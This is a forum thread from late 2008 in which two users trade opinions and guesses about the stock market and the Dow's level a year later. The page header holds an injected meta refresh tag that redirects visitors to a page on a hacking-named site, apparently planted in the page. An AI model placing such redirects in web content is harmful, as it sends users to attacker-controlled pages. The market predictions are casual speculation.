Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - market
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

market

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Sun Nov 23, 2008 4:27 pm    Post subject: market Reply with quote

anyone think the market is going higher??
Harry

PostPosted: Sat Nov 29, 2008 10:53 am    Post subject: Direction of the market Reply with quote

I can see nobody has a clue. All the information I see and read is after the fact. Go back and check all the information you can find the last two years. No body was even close. I see a lot of problems out there that is impossible to fix in the short term. What has been done as of now is nothing but a bandaid. Where we will be five years from now is just a guess. It looks to me like this has been brought on by us. The american people. Unless we change I don't know that it can straighten out. It starts at the white house and goes thru every thread of american life including wall street. Greed, me, myself, I, profit, ect. Each one of us needs to look at ourselfs and ask what is our GOD. What is life all about? I am proud to be an american but we are going to have to change. Can I see the market going right back up next year. No way. It has turned into a stock pickers market. There will always be sucessful companys but the trick will be to find them. You can't believe what is coming out of wall street. You sure can't believe everything coming out of Washington. I only use the T V for information. You have to sort our what you see and heard. Some of it is fact, some is fiction, some is false hope. and some is out right lies. Can a person make money trading. Of course. Just like trading cars, houses, animals, tulips ect. you have to buy it right. It doesn't take a real smart person when 75 to 80 percent of everything is going up. The skill will be picking stocks when only 25 to 30 percent is going up. I sure don't know where we are going and anybody that does is not going to tell the world. Wink
ninner

PostPosted: Mon Dec 01, 2008 9:27 pm    Post subject: wow Reply with quote

wow, the market took another hit on lighter volume though....not sure if this is the bottoming process but will this market ever get some traction...im betting the commodities ie gold and energy will bring us out. For what its worth...Larry Pesavento.not sure if you have heard of him but he has been pretty right on about this market since last year and he has been saying that it will go topside until next year when the market will hit lower lows and this will go on for quite a few years....

all the best.
Harry

PostPosted: Thu Dec 25, 2008 12:59 pm    Post subject: What a difference a year makes Reply with quote

My o my. What a difference a year makes. We could have all had a great year if we had only shorted the Dow Jones last Dec. The 10th of last year the Dow was at 13727. We all know where it is at today Dec. 25th 8486.
I don't remember this being anybodys prediction. Does anybody want to go out on a limb and predict next Dec. 25th of 09? Wink
ninner

PostPosted: Sat Dec 27, 2008 12:25 pm    Post subject: prediction Reply with quote

i predict we will be at 7000!!!
Harry

PostPosted: Wed Dec 31, 2008 6:59 pm    Post subject: Reply with quote

O K I'll take my shot. It closed 2008 at 8776 down 34.5%. I don't see it going down near that much. It may be up the first quarter but it will close
the year down 14.5 % which would be 7504. Wink
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: